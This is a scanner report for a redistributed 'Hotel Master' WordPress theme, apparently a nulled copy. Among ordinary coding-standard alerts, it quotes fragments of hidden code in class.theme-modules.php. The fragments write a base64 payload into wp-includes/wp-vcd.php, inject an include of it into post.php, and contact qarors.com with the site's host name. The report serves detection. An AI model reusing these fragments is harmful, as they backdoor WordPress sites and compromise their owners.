0
Validation results

Hotel Master | Shared By VestaThemes.com

Hotel Master | Shared By VestaThemes.com

WordPress 6.7 theme
0
  • THEME TYPEWordPress theme 6.7
  • FILE NAMEhotelmaster.zip
  • FILE SIZE13113912 bytes
  • MD5d586f3c909aaf440432b2a8c073d3996
  • SHA149d67297895bce21a3e54661a6bf079c9ca6c6aa
  • LICENSENone
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttp://themes.goodlayers.com/hotelmaster
  • VERSION3.02
  • AUTHOR URI
  • TAGSwhite, light, yellow, two-columns, fluid-layout, custom-background, custom-colors, featured-images, theme-options
  • CREATION DATE2019-09-25
  • LAST FILE UPDATE2019-09-25
  • LAST VALIDATION2019-09-25 04:39
  • OTHER VERSIONS

    4.0.1 : 0%

This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file gdlr-customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  3. Security breaches : Use of base64_decode() Found base64_decode in file twitteroauth.php. 208: $decoded_sig = base64_decode($signature);Found base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  4. Security breaches : Use of base64_encode() Found base64_encode in file twitteroauth.php. 
     return base64_encode(hash_hmac('sha1', $base_string, $key, true));
     return base64_encode($signature);
  5. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="//www.youtube.com/embed/' . $id[1] . '?wmode=transparent' . $id[2] . '" width="' . $width . '" height="' . $height . '" > in file gdlr-media.php. 55: return '<iframe src='//www.youtube.com/embed/' . $id[1] . '?wmode=transparent' . $i
  6. Malware : Operations on file system file_get_contents was found in the file gdlr-function-regist.php 87: $default_admin_option = unserialize(file_get_contents($default_file));fopen was found in the file gdlr-function-regist.php 110: //$file_stream = @fopen($file_url, 'w');fwrite was found in the file gdlr-function-regist.php 111: //fwrite($file_stream, serialize($theme_option));fclose was found in the file gdlr-function-regist.php 112: //fclose($file_stream);fopen was found in the file gdlr-admin-option.php 22: $file_stream = @fopen($file_url, 'w');fwrite was found in the file gdlr-admin-option.php 57: fwrite( $file_stream, str_replace('#gdlr#', $value, $option['selector']) . 126: fwrite($file_stream, $style);131: fwrite($file_stream, $end_of_file);135: fwrite($file_stream, str_replace('\r\n', '\n', $theme_option['additional-stfwrite was found in the file gdlr-admin-option.php 57: fwrite( $file_stream, str_replace('#gdlr#', $value, $option['selector']) . 126: fwrite($file_stream, $style);131: fwrite($file_stream, $end_of_file);135: fwrite($file_stream, str_replace('\r\n', '\n', $theme_option['additional-stfwrite was found in the file gdlr-admin-option.php 57: fwrite( $file_stream, str_replace('#gdlr#', $value, $option['selector']) . 126: fwrite($file_stream, $style);131: fwrite($file_stream, $end_of_file);135: fwrite($file_stream, str_replace('\r\n', '\n', $theme_option['additional-stfwrite was found in the file gdlr-admin-option.php 57: fwrite( $file_stream, str_replace('#gdlr#', $value, $option['selector']) . 126: fwrite($file_stream, $style);131: fwrite($file_stream, $end_of_file);135: fwrite($file_stream, str_replace('\r\n', '\n', $theme_option['additional-stfclose was found in the file gdlr-admin-option.php 139: fclose($file_stream);file_get_contents was found in the file twitteroauth.php 278: file_get_contents(self::$POST_INPUT)file_get_contents was found in the file goodlayers-importer.php 28: $default_admin_option = unserialize(file_get_contents($default_file));36: $default_admin_option = unserialize(file_get_contents($default_file));44: $default_admin_option = unserialize(file_get_contents($default_file));52: $default_admin_option = unserialize(file_get_contents($default_file));60: $default_admin_option = unserialize(file_get_contents($default_file));80: $widget_data = unserialize(file_get_contents($widget_file));file_get_contents was found in the file goodlayers-importer.php 28: $default_admin_option = unserialize(file_get_contents($default_file));36: $default_admin_option = unserialize(file_get_contents($default_file));44: $default_admin_option = unserialize(file_get_contents($default_file));52: $default_admin_option = unserialize(file_get_contents($default_file));60: $default_admin_option = unserialize(file_get_contents($default_file));80: $widget_data = unserialize(file_get_contents($widget_file));file_get_contents was found in the file goodlayers-importer.php 28: $default_admin_option = unserialize(file_get_contents($default_file));36: $default_admin_option = unserialize(file_get_contents($default_file));44: $default_admin_option = unserialize(file_get_contents($default_file));52: $default_admin_option = unserialize(file_get_contents($default_file));60: $default_admin_option = unserialize(file_get_contents($default_file));80: $widget_data = unserialize(file_get_contents($widget_file));file_get_contents was found in the file goodlayers-importer.php 28: $default_admin_option = unserialize(file_get_contents($default_file));36: $default_admin_option = unserialize(file_get_contents($default_file));44: $default_admin_option = unserialize(file_get_contents($default_file));52: $default_admin_option = unserialize(file_get_contents($default_file));60: $default_admin_option = unserialize(file_get_contents($default_file));80: $widget_data = unserialize(file_get_contents($widget_file));file_get_contents was found in the file goodlayers-importer.php 28: $default_admin_option = unserialize(file_get_contents($default_file));36: $default_admin_option = unserialize(file_get_contents($default_file));44: $default_admin_option = unserialize(file_get_contents($default_file));52: $default_admin_option = unserialize(file_get_contents($default_file));60: $default_admin_option = unserialize(file_get_contents($default_file));80: $widget_data = unserialize(file_get_contents($widget_file));file_get_contents was found in the file goodlayers-importer.php 28: $default_admin_option = unserialize(file_get_contents($default_file));36: $default_admin_option = unserialize(file_get_contents($default_file));44: $default_admin_option = unserialize(file_get_contents($default_file));52: $default_admin_option = unserialize(file_get_contents($default_file));60: $default_admin_option = unserialize(file_get_contents($default_file));80: $widget_data = unserialize(file_get_contents($widget_file));fopen was found in the file goodlayers-importer.php 111: //$file_stream = @fopen($widget_file, 'w');fwrite was found in the file goodlayers-importer.php 112: //fwrite($file_stream, serialize($widget_data));fclose was found in the file goodlayers-importer.php 113: //fclose($file_stream); file_get_contents was found in the file gdlr-font-loader.php 68: $google_fonts = json_decode(file_get_contents($google_font_file), true);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));177: $content = @file_get_contents('http://www.qarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.qarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);
  7. Malware : Network operations curl_init was found in the file twitteroauth.php 1069: $ci = curl_init();curl_exec was found in the file twitteroauth.php 1095: $response = curl_exec($ci);
  8. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-tgm-plugin-activation.php : 412: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_tFile gdlr-admin-panel.php : 49: $page = add_menu_page($this->setting['page_title'], $this->setting['menu_title'],
  9. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was gdlr-portfolio.zip goodlayers-importer.zip gdlr-hostel.zip gdlr-hotel.zip gdlr-shortcode.zip masterslider.zip.
Warning
  1. theme tags : Presence of bad theme tagsThe tag white has been deprecated, it must be removed from style.css header.The tag light has been deprecated, it must be removed from style.css header.The tag yellow has been deprecated, it must be removed from style.css header.The tag fluid-layout has been deprecated, it must be removed from style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is hotel-master-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Begin installing plugin', 'Begin installing plugins' in file gdlr-plugin-activation.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Activate installed plugin', 'Activate installed plugins' in file gdlr-plugin-activation.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are gdlr_translate, tgmpa, traveltour, gdlr-hotel.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_taxonomy() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  5. Line endings consistency : Both DOS and UNIX style line endingsFound a mix of \r\n and \n line endings in file gdlr-page-item.php.
  6. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  7. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  8. Featured image : Use of the_post_thumbnail() instead of custom fields for thumbnailsNo reference to the_post_thumbnail was found in the theme.
  9. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file twitteroauth.php.1134: echo '<strong>'.$tweets->errors[0]->message.'!</strong><br />You\'ll need to regenerate it <a href='https://dev.twitter.com/apps' target='_blank'>here</a>!' . $after_widget;
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : gdlr-plugin-activation.php 2: require_once(GDLR_LOCAL_PATH . '/include/plugin/class-tgm-plugin-activation If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : gdlr-framework.php 10: include_once('function/gdlr-sidebar-generator.php');13: include_once('function/gdlr-admin-panel.php'); 14: include_once('function/gdlr-admin-panel-html.php'); 17: include_once('function/gdlr-customizer.php'); 20: include_once('function/gdlr-page-builder.php'); 21: include_once('function/gdlr-page-builder-html.php'); 24: include_once('function/gdlr-page-options.php'); 27: include_once('function/gdlr-tax-meta.php'); 30: include_once('function/gdlr-include-script.php'); 33: include_once('function/gdlr-font-loader.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes
15

WordPress 6.7 theme

73

WordPress 6.7 theme

97

WordPress 6.7 theme